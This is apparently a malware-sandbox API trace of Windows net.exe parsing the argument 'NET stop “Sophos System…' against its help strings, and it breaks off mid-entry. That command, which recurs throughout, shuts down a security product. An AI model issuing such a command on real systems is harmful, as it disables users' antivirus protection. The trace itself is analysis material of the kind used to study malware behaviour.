FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START NET LOGON\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x16 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x11 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START RPCSS\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START SCHEDULE\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x12 [0038.505] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START SERVER\r\n", _MaxCount=0x19) returned 14 [0038.505] LocalFree (hMem=0x543f98) returned 0x0 [0038.505] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0xf [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START UPS\r\n", _MaxCount=0x19) returned 14 [0038.506] LocalFree (hMem=0x543f98) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x17 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START WORKSTATION\r\n", _MaxCount=0x19) returned 14 [0038.506] LocalFree (hMem=0x543f98) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x18 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x19) returned 14 [0038.506] LocalFree (hMem=0x543f98) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x2a [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET STATISTICS\r\n[WORKSTAT", _MaxCount=0x19) returned 14 [0038.506] LocalFree (hMem=0x543f98) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x19) returned 19 [0038.506] LocalFree (hMem=0x543f98) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*㾘T龜*") returned 0x58 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET TIME\r\n\r\n[\\\\computerna", _MaxCount=0x19) returned -1 [0038.506] LocalFree (hMem=0x547888) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0x184 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET USE\r\n[devicename | *]", _MaxCount=0x19) returned -2 [0038.506] LocalFree (hMem=0x547888) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0xc7 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET USER\r\n[username [pass", _MaxCount=0x19) returned -2 [0038.506] LocalFree (hMem=0x547888) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0x47 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET VIEW\r\n[\\\\computername", _MaxCount=0x19) returned -3 [0038.506] LocalFree (hMem=0x547888) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0xc2 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NET\r\n [ ACCOUNTS | COM", _MaxCount=0x19) returned 19 [0038.506] LocalFree (hMem=0x547888) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0x319 [0038.506] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="SERVICES\r\nNET START can b", _MaxCount=0x19) returned -5 [0038.506] LocalFree (hMem=0x547888) returned 0x0 [0038.506] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0x483 [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="SYNTAX\r\nThe following con", _MaxCount=0x19) returned -5 [0038.507] LocalFree (hMem=0x547888) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0xa86 [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="NAMES\r\nThe following type", _MaxCount=0x19) returned 4 [0038.507] LocalFree (hMem=0x547888) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0x54 [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos System", _String2="\r\nFor more information on", _MaxCount=0x19) returned 97 [0038.507] LocalFree (hMem=0x547888) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*碈T龜*") returned 0xad [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET ACCOUNTS\r\n[/FO", _MaxCount=0x12) returned 18 [0038.507] LocalFree (hMem=0x547888) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*碈T龜*") returned 0x2e [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET COMPUTER\r\n\\\\co", _MaxCount=0x12) returned 16 [0038.507] LocalFree (hMem=0x543f98) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*㾘T龜*") returned 0x7d [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG SERVER\r", _MaxCount=0x12) returned 16 [0038.507] LocalFree (hMem=0x547888) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*碈T龜*") returned 0x26 [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONFIG\r\n[SERVE", _MaxCount=0x12) returned 16 [0038.507] LocalFree (hMem=0x543f98) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET CONTINUE\r\nserv", _MaxCount=0x12) returned 16 [0038.507] LocalFree (hMem=0x543f98) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x1b [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET FILE\r\n[id [/CL", _MaxCount=0x12) returned 13 [0038.507] LocalFree (hMem=0x543f98) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*㾘T龜*") returned 0xbe [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET GROUP\r\n[groupn", _MaxCount=0x12) returned 12 [0038.507] LocalFree (hMem=0x547888) returned 0x0 [0038.507] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*碈T龜*") returned 0x33 [0038.507] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELP\r\ncommand\r", _MaxCount=0x12) returned 11 [0038.507] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*㾘T龜*") returned 0xc1 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0038.508] LocalFree (hMem=0x547888) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*碈T龜*") returned 0x16 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x33 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="碈T⡋瓢琉*㾘T龜*") returned 0x234 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0038.508] LocalFree (hMem=0x547888) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*碈T龜*") returned 0x13 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x14 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x16 [0038.508] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0038.508] LocalFree (hMem=0x543f98) returned 0x0 [0038.508] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㶰T⡋瓢琉*㾘T龜*") returned 0x11 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543db0) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㶰T龜*") returned 0x14 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x12 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0xf [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x17 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x18 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x2a [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x15 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0038.509] LocalFree (hMem=0x543f98) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*㾘T龜*") returned 0x58 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0038.509] LocalFree (hMem=0x54b888) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0x184 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0038.509] LocalFree (hMem=0x54b888) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0xc7 [0038.509] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0038.509] LocalFree (hMem=0x54b888) returned 0x0 [0038.509] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0x47 [0038.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0xc2 [0038.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0x319 [0038.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0x483 [0038.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0xa86 [0038.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0x54 [0038.510] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*뢈T龜*") returned 0xad [0038.510] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*뢈T龜*") returned 0x2e [0038.510] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0038.510] LocalFree (hMem=0x543f98) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*㾘T龜*") returned 0x7d [0038.510] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0038.510] LocalFree (hMem=0x54b888) returned 0x0 [0038.510] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*뢈T龜*") returned 0x26 [0038.510] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x1b [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*㾘T龜*") returned 0xbe [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0038.511] LocalFree (hMem=0x54b888) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*뢈T龜*") returned 0x33 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*㾘T龜*") returned 0x19 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0038.511] LocalFree (hMem=0x543f98) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="뢈T⡋瓢琉*㾘T龜*") returned 0xc1 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0038.511] LocalFree (hMem=0x54b888) returned 0x0 [0038.511] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74770000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x2af914, nSize=0x0, Arguments=0x2af910 | out: lpBuffer="㾘T⡋瓢琉*뢈T龜*") returned 0x16 [0038.511] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0038.511] LocalFree 